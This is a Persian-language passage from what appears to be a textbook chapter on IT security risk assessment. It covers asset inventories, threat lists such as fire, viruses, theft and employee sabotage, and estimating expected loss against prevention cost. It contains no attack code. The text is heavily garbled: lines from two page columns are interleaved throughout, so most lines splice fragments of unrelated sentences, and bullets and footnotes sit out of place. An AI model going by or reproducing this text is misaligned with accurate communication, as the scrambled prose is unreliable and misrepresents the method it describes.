ﺍﻓﺰﺍﺭﻫﺎﻱ ﺗﺨﺼﺼ ﹺ
ﺷﻤﺎ ﺑﺎﻳﺪ ﺑﺠﺎﻱ ﺗﻮﺟﻪ ﺻﺮﻑ ﺑﻪ ﺟﻨﺒﻪﻫـﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ،ﻧﮕﺮﺷـﻲ
ﻭﺳﻴﻌﺘﺮ ﺑﻪ ﺍﻗﻼﻡ ﻓﻮﻕ ﻭ ﺳﺎﻳﺮ ﻣﻮﺍﺭﺩ ﻣﺮﺑﻮﻃﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻴﺪ .ﺍﮔـﺮ ﺷﻨﺎﺳﺎﻳﻲ ﺩﺍﺭﺍﺋﻴﻬﺎ
ﺷﻤﺎ ﻧﮕﺮﺍﻥ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻫﺴﺘﻴﺪ ﻛﻪ ﻛﺴﻲ ﺑﺘﻮﺍﻧﺪ ﮔﺰﺍﺭﺷﺎﺕ ﻣﺎﻟﻲ
ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺍﻗﻼﻣﻲ ﻛﻪ ﺑﻪ ﺣﻔﺎﻇﺖ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ ﺗﻬﻴﻪ ﻛﻨﻴـﺪ .ﺍﻳـﻦ
ﺷﻤﺎ ﺭﺍ ﻣﻄﺎﻟﻌﻪ ﻛﻨﺪ ،ﺷﻴﻮﺓ ﺩﺳﺘﺮﺳﻲ ﺁﻥ ﻓﺮﺩ ﺑﻪ ﺍﻳـﻦ ﺍﻃﻼﻋـﺎﺕ ﻓﻬﺮﺳﺖ ﺑﺎﻳﺪ ﺑﺮ ﺍﺳﺎﺱ ﻃﺮﺡ ﻛـﺴﺐ ﻭ ﻛـﺎﺭ ٦٩ﻭ ﺩﺍﻧـﺶ ﻋﺮﻓـﻲ
)ﭼﻪ ﺍﺯ ﻃﺮﻳﻖ ﻧﺴﺨﻪﻫﺎﻱ ﻛﺎﻏﺬﻱ ﭼﻪ ﺍﺯ ﻃﺮﻳﻖ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﭼـﻪ ﺍﺯ
ﺷــﻤﺎ ﺗﻨﻈــﻴﻢ ﺷــﻮﺩ .ﺍﻳــﻦ ﻓﺮﺁﻳﻨــﺪ ﻧﻴﺎﺯﻣﻨــﺪ ﺁﮔــﺎﻫﻲ ﺍﺯ ﻗــﻮﺍﻧﻴﻦ
ﻃﺮﻳﻖ ﺩﺳﺘﺮﺳﻲ ﻣﺴﺘﻘﻴﻢ ﺑﻪ ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ( ﺍﺯ ﺍﻫﻤﻴـﺖ ﺧﺎﺻـﻲ ﻛﺎﺭﺑﺮﺩﻱ ،ﺩﺭﻙ ﻛﺎﻣﻞ ﺗﺴﻬﻴﻼﺕ ،ﻭ ﻋﻠـﻢ ﺑـﻪ ﮔـﺴﺘﺮﺓ ﭘﻮﺷـﺶ
ﺑﺮﺧﻮﺭﺩﺍﺭ ﻧﻴﺴﺖ ﻭ ﻛﻠﻴﺔ ﺭﺍﻫﻬﺎ ﺑﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﭼﻨـﻴﻦ ﻛـﺎﺭﻱ ﺑﺎﻳـﺪ
ﺑﻴﻤﺔ ﺷﻤﺎ ﺍﺳﺖ .ﺍﻗﻼﻡ ﺗﺤﺖ ﺣﻔﺎﻇﺖ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻠﻤـﻮﺱ )ﻣﺜـﻞ
ﻣﺴﺪﻭﺩ ﺷﺪﻩ ﺑﺎﺷﻨﺪ. ﺩﻳﺴﻚﮔﺮﺩﺍﻧﻬﺎ ،ﺻﻔﺤﺎﺕ ﻧﻤﺎﻳﺶ ،ﻛﺎﺑﻠﻬﺎﻱ ﺷﺒﻜﻪ ،ﺗﺠﻬﻴﺰﺍﺕ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ،
ﻭ ﻛﺘﺎﺑﭽﻪﻫﺎﻱ ﺭﺍﻫﻨﻤﺎ( ﻭ ﻳﺎ ﻏﻴﺮﻣﻠﻤﻮﺱ )ﻣﺜﻞ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺭﺍﻳﺎﻧـﻪ ،ﺭﻣـﺰ
ﺷﻨﺎﺳﺎﻳﻲ ﺗﻬﺪﻳﺪﺍﺕ ﻋﺒﻮﺭ ﺍﺻﻠﻲ ،ﺗﻮﺍﻧﺎﻳﻲ ﺍﺩﺍﻣﺔ ﭘﺮﺩﺍﺯﺵ ،ﻓﻬﺮﺳﺖ ﻣـﺸﺘﺮﻳﺎﻥ ،ﻭﺟﻬـﺔ ﻋﻤـﻮﻣﻲ ،ﻭ
ﻣﺮﺣﻠﺔ ﺑﻌﺪﻱ ﺗﻌﻴﻴﻦ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺗﻬﺪﻳﺪﺍﺕ ﻣﻮﺟﻮﺩ ﺑﺮﺍﻱ ﺩﺍﺭﺍﻳـﻲ ﺍﻋﺘﺒﺎﺭ ﺩﺭ ﺻﻨﻌﺖ( ﺑﺎﺷﻨﺪ .ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﺑﺎﻳﺪ ﻫﺮ ﭼﻴـﺰﻱ ﻛـﻪ ﺑـﺮﺍﻱ
ﺷﻤﺎ ﻣﻲﺑﺎﺷﺪ .ﺑﺮﺧـﻲ ﺍﺯ ﺗﻬﺪﻳـﺪﺍﺕ ﻣﺤﻴﻄـﻲ ﻫـﺴﺘﻨﺪ ﻭ ﺷـﺎﻣﻞ ﺷﻤﺎ ﺍﺭﺯﺷﻤﻨﺪ ﺍﺳﺖ ﺭﺍ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﺩ .ﺑـﺮﺍﻱ ﺗـﺸﺨﻴﺺ ﺍﺭﺯﺷـﻤﻨﺪ
ﺁﺗﺶﺳﻮﺯﻱ ،ﺯﻟﺰﻟﻪ ،ﺍﻧﻔﺠﺎﺭ ﻭ ﺳﻴﻞ ﻣﻲﺷﻮﻧﺪ .ﺍﻳﻦ ﻓﻬﺮﺳﺘﻬﺎ ﺑﺎﻳـﺪ ﺑﻮﺩﻥ ﻫﺮ ﻣﻮﺭﺩ ،ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ ﻛﻪ ﺩﺭﺻﻮﺭﺕ ﺗﺨﺮﻳﺐ ﻳﺎ ﻓﻘـﺪﺍﻥ
ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩ ﺑﺴﻴﺎﺭ ﻧﺎﺩﺭ ﺍﻣﺎ ﻣﻤﻜﻦ ﻫﻢ ﺑﺎﺷﻨﺪ؛ ﻣﺜﻞ ﺑـﺮﻭﺯ ﻧﻘـﺺ ﺁﻥ ،ﭼﻪ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺯﻣﺎﻧﻲ ﻭ ﭘﻮﻟﻲ ﺑﺮﺍﻱ ﺗﻌﻤﻴﺮ ﻳﺎ ﺟـﺎﻳﮕﺰﻳﻨﻲ ﺁﻥ
ﻛﻠﻲ ﺩﺭ ﺳﺎﺧﺘﻤﺎﻥ ﻳﺎ ﭘﻴﺪﺍﺷﺪﻥ ﻣﻮﺍﺩ ﺁﺗـﺸﺰﺍ ﺩﺭ ﺩﻳﻮﺍﺭﻫـﺎﻱ ﺍﺗـﺎﻕ ﺑﻪ ﺷﻤﺎ ﺗﺤﻤﻴﻞ ﻣﻲﺷﻮﺩ .ﺑﺮﺧﻲ ﺍﺯ ﻣﻮﺍﺭﺩﻳﻜﻪ ﺑﻄﻮﺭ ﺣﺘﻢ ﺑﺎﻳـﺪ ﺩﺭ
ﺭﺍﻳﺎﻧﻪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﻤﺎ ﺭﺍ ﺑﺮﺍﻱ ﻣﺪﺗﻲ ﻧﻪﭼﻨﺪﺍﻥ ﻛﻮﺗﺎﻩ ﻭﺍﺩﺍﺭ ﻓﻬﺮﺳﺖ ﺍﺭﺯﻳﺎﺑﻲ ﺷﻤﺎ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ:
ﺑﻪ ﺗﺨﻠﻴﺔ ﺍﺗﺎﻕ ﻧﻤﺎﻳﺪ .ﺳﺎﻳﺮ ﺗﻬﺪﻳﺪﺍﺕ ﺍﺯ ﻛﺎﺭﻛﻨﺎﻥ ﻭ ﺍﻓـﺮﺍﺩ ﺧـﺎﺭﺝ
ﺳﺎﺯﻣﺎﻥ ﻧﺸﺄﺕ ﻣﻲﮔﻴﺮﻧﺪ .ﺩﺭ ﺍﻳﻨﺠﺎ ﻣﺜﺎﻟﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺍﻳﻦ ﺩﺳـﺘﻪ ﺍﺯ ﻣﻮﺍﺭﺩ ﻣﻠﻤﻮﺱ:
ﺗﻬﺪﻳﺪﺍﺕ ﺫﻛﺮ ﺷﺪﻩﺍﻧﺪ:
ﺭﺍﻳﺎﻧﻪﻫﺎ؛ o
ﺑﻴﻤﺎﺭﻱ ﺍﻓﺮﺍﺩ ﻛﻠﻴﺪﻱ؛ • ﺩﺍﺩﻩﻫﺎﻱ ﺍﺧﺘﺼﺎﺻﻲ؛ o
ﺑﻴﻤﺎﺭﻱ ﻫﻤﺰﻣﺎﻥ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺎﺭﻛﻨـﺎﻥ )ﻧﻈﻴـﺮ ﺑﻴﻤﺎﺭﻳﻬـﺎﻱ • ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﻭ ﺑﺎﻳﮕﺎﻧﻲ؛ o
ﻣﺴﺮﻱ ﻣﺜﻞ ﺁﻧﻔﻮﻻﻧﺰﺍ(؛ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎ ،ﺭﺍﻫﻨﻤﺎﻫﺎ ﻭ ﻛﺘﺎﺑﻬﺎ؛ o
ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﭘﺮﺳﻨﻞ ﻛﻠﻴﺪﻱ )ﻣـﺮﮒ ،ﺑﺎﺯﻧﺸـﺴﺘﮕﻲ ،ﭘﺎﻳـﺎﻥ • ﻧﺴﺨﻪﻫﺎﻱ ﭼﺎﭘﻲ؛ o
ﻳﺎﻓﺘﻦ ﺩﻭﺭﺓ ﻛﺎﺭﻱ(؛ ﻭﺳﺎﻳﻞ ﺗﻮﺯﻳﻊ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺗﺠﺎﺭﻱ؛ o
ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﺧﺪﻣﺎﺕ ﺗﻠﻔﻦ ﻳﺎ ﺷﺒﻜﻪ؛ • ﻭﺳﺎﻳﻞ ﺍﺭﺗﺒﺎﻃﻲ ﻭ ﻛﺎﺑﻞﻛﺸﻲﻫﺎ؛ o
ﻗﻄﻊ ﺧﺪﻣﺎﺕ ﺷﻬﺮﻱ )ﺗﻠﻔﻦ ،ﺑﺮﻕ ،ﺁﺏ( ﺑﺮﺍﻱ ﻣﺪﺗﻲ ﻛﻮﺗﺎﻩ؛ • ﺳﻮﺍﺑﻖ ﻛﺎﺭﻛﻨﺎﻥ؛ ﻭ o
ﻗﻄﻊ ﺧﺪﻣﺎﺕ ﺷﻬﺮﻱ ﺑﺮﺍﻱ ﻣﺪﺕ ﻃﻮﻻﻧﻲ؛ • ﺍﺳﻨﺎﺩ ﺣﺴﺎﺑﺮﺳﻲﺷﺪﻩ. o
ﺻﺎﻋﻘﻪ؛ •
ﺳﻴﻞ؛ • ﻣﻮﺍﺭﺩ ﻏﻴﺮﻣﻠﻤﻮﺱ:
ﺳﺮﻗﺖ ﺩﻳﺴﻜﻬﺎ ﻳﺎ ﻧﻮﺍﺭﻫﺎ؛ • ﺍﻣﻨﻴﺖ ﻭ ﺳﻼﻣﺖ ﻛﺎﺭﻛﻨﺎﻥ؛ o
ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﺔ ﻛﻴﻔﻲ ﻳﻚ ﻓﺮﺩ ﻛﻠﻴﺪﻱ؛ • ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﻛﺎﺭﺑﺮﺍﻥ؛ o
ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﺔ ﺧﺎﻧﮕﻲ ﻳﻚ ﻓﺮﺩ ﻛﻠﻴﺪﻱ؛ • ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻛﺎﺭﻛﻨﺎﻥ؛ o
ﻭﺭﻭﺩ ﻳﻚ ﻭﻳﺮﻭﺱ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎ؛ • ﻭﺟﻬﺔ ﻋﻤﻮﻣﻲ ﻭ ﺍﻋﺘﺒﺎﺭ ﺳﺎﺯﻣﺎﻥ؛ o
ﻭﺭﺷﻜـﺴﺘﮕﻲ ﻓﺮﻭﺷــﻨﺪﮔﺎﻥ ﻳـﺎ ﺷــﺮﻛﺘﻬﺎﻱ ﺍﺭﺍﺋـﻪﺩﻫﻨــﺪﺓ •
ﺧﺪﻣﺎﺕ ﻛﻠﻴﺪﻱ ﻃﺮﻑ ﻗﺮﺍﺭﺩﺍﺩ ﺑﺎ ﺷﻤﺎ؛ 69 Business Plan
١٤٣ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺗﺠﻬﻴﺰﺍﺕ ﻭ ﻣﺤﺼﻮﻻﺕ ﺭﺍ ﻣﺤﺎﺳﺒﻪ ﻛﻨﻴﻢ .ﻳﻚ ﺷﻴﻮﺓ ﭘﻴﭽﻴﺪﻩﺗـ ﹺﺮ ﺍﺷﻜﺎﻻﺕ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ؛ •
ﺍﺣﺘﺴﺎﺏ ﻫﺰﻳﻨـﻪﻫـﺎﻱ ﻋـﺪﻡ ﺍﺭﺍﺋـﻪ ﺧـﺪﻣﺎﺕ ،ﺁﻣـﻮﺯﺵ ﻣﺠـﺪﺩ، ﺍﺷﻜﺎﻻﺕ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ؛ •
ﺭﻭﺍﻟﻬﺎﻱ ﺍﺿﺎﻓﻪﺷـﺪﺓ ﻧﺎﺷـﻲ ﺍﺯ ﺁﺳـﻴﺐ ،ﺍﺯ ﺩﺳـﺖ ﺭﻓـﺘﻦ ﺍﻋﺘﺒـﺎﺭ ﺧﺮﺍﺑﻜﺎﺭﻱ ﻛﺎﺭﻣﻨﺪﺍﻥ؛ •
ﺷﺮﻛﺖ ،ﻭ ﺣﺘﻲ ﺧﺴﺎﺭﺗﻬﺎﻱ ﻭﺍﺭﺩﺷﺪﻩ ﺑﻪ ﻣﺸﺘﺮﻳﺎﻥ ﺷﺮﻛﺖ ﺍﺳﺖ. ﺧﺮﺍﺑﻜﺎﺭﻱ ﭘﺮﺳـﻨﻞ ﺷـﺨﺺ ﺛﺎﻟـﺚ )ﻣـﺜ ﹰ
ﻼ ﻛﺎﺭﻣﻨـﺪ ﺑﺨـﺶ •
ﺑﻄﻮﺭ ﻛﻠﻲ ﺍﻓﺰﻭﺩﻥ ﻋﻮﺍﻣﻞ ﺟـﺎﻧﺒﻲ ﺑـﻪ ﻣﺤﺎﺳـﺒﺔ ﻫﺰﻳﻨـﻪ ﺑﺎﻋـﺚ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ(؛
ﺯﺣﻤﺖ ﺑﻴﺸﺘﺮﻱ ﻣﻲﺷﻮﺩ ﻭﻟﻲ ﺩﻗﺖ ﺗﺨﻤﻴﻦ ﺭﺍ ﺑﺎﻻ ﻣـﻲﺑـﺮﺩ .ﺩﺭ ﺍﻏﺘﺸﺎﺵ ﻛﺎﺭﻛﻨﺎﻥ؛ •
ﺍﻛﺜﺮ ﻣﻮﺍﺭﺩ ﻧﻴﺎﺯﻱ ﺑﻪ ﺗﻌﻴﻴﻦ ﺩﻗﻴﻖ ﺍﺭﺯﺵ ﻭ ﻫﺰﻳﻨﺔ ﻫـﺮ ﻣﺨـﺎﻃﺮﻩ ﻣﻬﺎﺟﻤﻴﻨﻲ ﻛﻪ ﺑﺼﻮﺭﺕ ﺗـﺼﺎﺩﻓﻲ ﺑـﻪ ﻣﺎﺷـﻴﻨﻬﺎﻱ ﺷـﻤﺎ •
ﻧﻴﺴﺖ ﻭ ﺩﺭ ﺣﺎﻟﺖ ﻋﺎﺩﻱ ﺍﺧﺘﺼﺎﺹ ﻳﻚ ﺑﺎﺯﻩ ﻳﺎ ﻣﺤﺪﻭﺩﺓ ﻫﺰﻳﻨﻪ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻣﻲﻛﻨﻨﺪ؛
ﺑﺮﺍﻱ ﻫﺮ ﺗﻬﺪﻳﺪ ﻛﻔﺎﻳﺖ ﻣﻲﻛﻨﺪ .ﺑﺮﺧﻲ ﺍﺯ ﺍﻗﻼﻡ ﺁﺳـﻴﺐﺩﻳـﺪﻩ ﺭﺍ ﻛــﺎﺭﺑﺮﺍﻧﻲ ﻛــﻪ ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧــﺖ ﺍﻃﻼﻋــﺎﺕ ﺳــﺎﺯﻣﺎﻧﻲ •
ﻣــﻲﺗــﻮﺍﻥ ﺩﺭ ﺩﺳــﺘﺔ ﺍﻗــﻼﻡ ﻏﻴﺮﻗﺎﺑــﻞ ﺗﻌﻤﻴــﺮ ﻭ ﺟــﺎﻳﮕﺰﻳﻨﻲ ﻳــﺎ ﺗﺤﺮﻳﻚﻛﻨﻨﺪﻩ ﻳﺎ ﺍﻧﺤﺼﺎﺭﻱ ﻣﻲﻓﺮﺳﺘﻨﺪ؛ ﻭ
ﺟﺒﺮﺍﻥﻧﺎﭘﺬﻳﺮ ﻗـﺮﺍﺭ ﺩﺍﺩ؛ ﻣﺜـﻞ ﭘـﺎﻙ ﺷـﺪﻥ ﻛﺎﻣـﻞ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﺓ ﺟﺎﺳﻮﺳﻬﺎﻱ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﺔ ﺗﺠﺎﺭﻱ. •
ﺣﺴﺎﺑﻬﺎ ،ﻳﺎ ﻣﺮﮒ ﻳﻚ ﻛﺎﺭﻣﻨﺪ ﻛﻠﻴﺪﻱ .ﺷـﺎﻳﺪ ﺑﺨﻮﺍﻫﻴـﺪ ﻫﺰﻳﻨـﺔ
ﺍﻳﻦ ﺧﺴﺎﺭﺗﻬﺎ ﺭﺍ ﺑﺎ ﻣﻘﻴﺎﺳﻬﺎ ﻇﺮﻳﻔﺘﺮﻱ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻴـﺪ؛ ﻣﺤﺎﺳﺒﺔ ﻣﺨﺎﻃﺮﺍﺕ
ﻼ ﺑﺮﺍﻱ ﻫﺮﻳـﻚ ﺍﺯ ﻣـﻮﺍﺭﺩ ﺫﻳـﻞ ﻫﺰﻳﻨـﺔ ﺟﺪﺍﮔﺎﻧـﻪﺍﻱ ﺩﺭﻧﻈـﺮ ﻣﺜ ﹰ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﺍﺕ ﻧﺒﺎﻳﺪ ﺗﻨﻬﺎ ﻳﻜﺒـﺎﺭ ﺍﻧﺠـﺎﻡ ﺷـﻮﺩ ﻭ ﭘـﺲ ﺍﺯ ﺁﻥ
ﺑﺨﺶ ﺳﻮﻡ
ﺑﺮﺍﻱ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﻭﻗﻮﻉ ﺁﻧﺮﺍ ﺑﺪﺍﻧﻴﺪ .ﺍﮔﺮ ﺧﻴﻠـﻲ ﺩﻗﻴـﻖ ﻫـﺴﺘﻴﺪ ﺷــﺮﻛﺖ ﺑــﺮﻕ ﺑــﺮ ﺍﺳــﺎﺱ ﺗﺠﺮﺑــﺔ ﺳــﺎﻝ ﮔﺬﺷــﺘﺔ ﺧــﻮﺩ •
ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺣﺘﻤـﺎﻝ ﻧﺎﻣﻨﺎﺳـﺐ ﺑـﻮﺩﻥ ﺗﻤﻬﻴـﺪﺍﺕ ﺩﻓـﺎﻋﻲ ﺭﺍ ﻧﻴـﺰ ﺑﺮﺁﻭﺭﺩﻱ ﺍﺯ ﺍﺣﺘﻤﺎﻝ ﻗﻄﻊ ﺑﺮﻕ ﺩﺭ ﺧﻼﻝ ﺳﺎﻝ ﺁﻳﻨﺪﻩ ﺩﺍﺭﺩ.
ﻣﺤﺎﺳﺒﻪ ﻛﻨﻴﺪ .ﺍﻛﻨﻮﻥ ﻓﺮﺁﻳﻨﺪ ﺗﺼﻤﻴﻢﮔﻴﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻦ ﻣﻘﺎﻣﺎﺕ ﻣﺴﺌﻮﻝ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﺨﺎﻃﺮﺓ ﻗﻄﻊ ﺑﺮﻕ ﺑـﺮﺍﻱ
ﻼ ﺭﻭﺷـﻦ ﺍﺳـﺖ .ﻛﺎﻓﻴـﺴﺖ ﻳﺎ ﻧﮕﺮﻓﺘﻦ ﻫﺮ ﻣﻜﺎﻧﻴﺰﻡ ﺩﻓﺎﻋﻲ ﻛﺎﻣ ﹰ ﭼﻨﺪ ﺛﺎﻧﻴﻪ ،ﭼﻨﺪ ﺩﻗﻴﻘﻪ ،ﻭ ﻳﺎ ﭼﻨﺪ ﺳﺎﻋﺖ ﻣﺤﺎﺳﺒﻪ ﻧﻤﺎﻳﻨﺪ.
ﺷﻤﺎ ﺿﺮﺭ ﻣﻮﺭﺩ ﺍﻧﺘﻈـﺎﺭ ﻫـﺮ ﻣﺨـﺎﻃﺮﻩ ﺭﺍ ﺩﺭ ﺍﺣﺘﻤـﺎﻝ ﻭﻗـﻮﻉ ﺁﻥ ﺳﻮﺍﺑﻖ ﭘﺮﺳﻨﻠﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﺗﺨﻤـﻴﻦ ﺍﺣﺘﻤـﺎﻝ ﺍﺳـﺘﻌﻔﺎﻱ •
ﺿﺮﺏ ﻛﻨﻴﺪ ﺗﺎ ﺑﺮﺍﻱ ﻫﺮ ﺗﻬﺪﻳﺪ ﻳﻚ ﻛﻤﻴـﺖ ﺑﺪﺳـﺖ ﺁﻳـﺪ .ﺍﻳـﻦ ﻳﻚ ﻛﺎﺭﻣﻨﺪ ﻛﻠﻴﺪﻱ ﺑﺨﺶ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﺷﻤﺎ ﻛﻤﻚ ﻛﻨﺪ.
ﺍﺭﻗﺎﻡ ﺭﺍ ﺑﻪ ﺗﺮﺗﻴﺐ ﻧﺰﻭﻟﻲ ﻣﺮﺗﺐ ﻧﻤﺎﻳﻴـﺪ ﻭ ﻛﻤﻴـﺖ ﻣﺘﻨـﺎﻇﺮ ﻫـﺮ
ﺗﻬﺪﻳﺪ ﺭﺍ ﺑﺎ ﻫﺰﻳﻨﺔ ﭘﻴﺸﮕﻴﺮﻱ ﺁﻥ ﻣﻘﺎﻳﺴﻪ ﻧﻤﺎﻳﻴﺪ. ﺧﻮﺷﺒﻴﻨﺎﻧﻪﺗـﺮﻳﻦ ﺣﺪﺳـﻴﺎﺕ ﺩﺭ ﻣـﻮﺭﺩ ﺗﻜـﺮﺍﺭ ﺗﺠﺮﺑﻴـﺎﺕ •
ﮔﺬﺷﺘﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﺗﺨﻤﻴﻦ ﺍﺣﺘﻤﺎﻝ ﻛﺸﻒ ﺍﺷﻜﺎﻻﺕ
ﻧﺘﻴﺠﺔ ﺍﻳﻦ ﻣﻘﺎﻳﺴﻪ ﻓﻬﺮﺳﺘﻲ ﺍﺳﺖ ﺍﻭﻟﻮﻳﺖﺑﻨﺪﻱ ﺷـﺪﻩ ﺍﺯ ﺁﻧﭽـﻪ ﺟﺪﻱ ﺩﺭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺷﻤﺎ ﺩﺭ ﺧﻼﻝ ﺳﺎﻝ ﺁﻳﻨـﺪﻩ ﻣـﻮﺭﺩ
ﻛﻪ ﺑﺎﻳﺪ ﺍﻧﺠﺎﻡ ﺷﻮﺩ .ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺩﺭ ﺍﺑﺘـﺪﺍ ﻛﻤـﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ.
ﺗﻌﺠﺐﺁﻭﺭ ﺑﺎﺷﺪ .ﺗﻮﺟﻪ ﻛﻨﻴﺪ ﻛﻪ ﻫﺪﻑ ﺷـﻤﺎ ﺑﺎﻳـﺪ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ
ﺯﻳﺎﻧﻬﺎﻱ ﭘﺮﻫﺰﻳﻨﻪ ﻭ ﻣﺤﺘﻤﻞ ﻭ ﺗﻮﺟـﻪ ﻛﻤﺘـﺮ ﺑـﻪ ﻣـﻮﺍﺭﺩ ﻧـﺎﺩﺭ ﻭ ﺍﮔﺮ ﺍﻧﺘﻈﺎﺭ ﺩﺍﺭﻳﺪ ﺣﺎﺩﺛـﻪﺍﻱ ﺑـﻴﺶ ﺍﺯ ﻳﻜﺒـﺎﺭ ﺩﺭ ﺳـﺎﻝ ﺭﺥ ﺩﻫـﺪ،
ﻛﻢﻫﺰﻳﻨﻪ ﺑﺎﺷﺪ .ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺤﻴﻄﻬﺎ ﺍﺣﺘﻤﺎﻝ ﻭﻗـﻮﻉ ﻣـﻮﺍﺭﺩﻱ ﺗﻌﺪﺍﺩ ﺩﻓﻌﺎﺕ ﻭﻗﻮﻉ ﺁﻧﺮﺍ ﺩﺭ ﻃﻮﻝ ﻳﻜﺴﺎﻝ ﺛﺒﺖ ﻛﻨﻴـﺪ .ﻣـﺜ ﹰ
ﻼ ﺍﮔـﺮ
ﻧﻈﻴﺮ ﺁﺗﺶﺳﻮﺯﻱ ﻭ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﭘﺮﺳﻨﻞ ﻛﻠﻴﺪﻱ ﺑـﺴﻴﺎﺭ ﺑـﻴﺶ ﻭﻗﻮﻉ ﺯﻟﺰﻟﻪ ﺭﺍ ﺩﺭ ﻫﺮ ۱۰۰ﺳﺎﻝ ﻳﻜﺒﺎﺭ ﭘﻴﺶﺑﻴﻨـﻲ ﻛﻨﻴـﺪ ،ﻃﺒـﻖ
ﺍﺯ ﻣﻮﺭﺩ ﻧﻔﻮﺫ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺷﺒﻜﻪ ﻣﻲﺑﺎﺷﺪ؛ ﺍﻣﺎ ﺑـﺎ ﻛﻤـﺎﻝ ﺗﻌﺠـﺐ ﺁﻧﭽﻪ ﮔﻔﺘﻪ ﺷﺪ ﺩﺭ ﻓﻬﺮﺳﺖ ﺷﻤﺎ ﻣﻲﺷـﻮﺩ %۱؛ ﺍﮔـﺮ ﺍﻣـﺎ ﺍﻧﺘﻈـﺎﺭ
ﺍﻳﻦ ﻧﻔﻮﺫﻫﺎﻱ ﺷﺒﻜﻪﺍﻱ ﻫﺴﺘﻨﺪ ﻛﻪ ﺗﻮﺟـﻪ ﻣـﺪﻳﺮﺍﻥ ﻭ ﺩﺭﻧﺘﻴﺠـﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻃﻲ ﻣﺎﻩ ﺁﻳﻨﺪﻩ ﺳﻪ ﺍﺷﻜﺎﻝ ﺟﺪﻱ ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ
ﻗﺴﻤﺖ ﻋﻤﺪﻩﺍﻱ ﺍﺯ ﺑﻮﺩﺟﻪ ﺭﺍ ﺑـﻪ ﺧـﻮﺩ ﺟﻠـﺐ ﻣـﻲﻛﻨﻨـﺪ .ﺍﻳـﻦ Microsoft IISﻛﺸﻒ ﺷﻮﺩ ،ﺧﻮﺍﻫﺪ ﺷﺪ .%۳۶۰۰
ﻋﻤﻠﻜﺮﺩ ﺍﺯ ﻟﺤﺎﻅ ﻫﺰﻳﻨـﻪ ﺍﺛـﺮﺑﺨﺶ ﻧﻴـﺴﺖ ﻭ ﺑـﺎﻻﺗﺮﻳﻦ ﺳـﻄﺢ
ﻫﺰﻳﻨﺔ ﭘﻴﺸﮕﻴﺮﻱ
ﺍﻃﻤﻴﻨﺎﻥ ﺭﺍ ﺑﺮﺍﻱ ﻛﻞ ﺳﻴﺴﺘﻢ ﻓﺮﺍﻫﻢ ﻧﻤـﻲﻛﻨـﺪ .ﺑـﺮﺍﻱ ﺗﺠـﺴﻢ
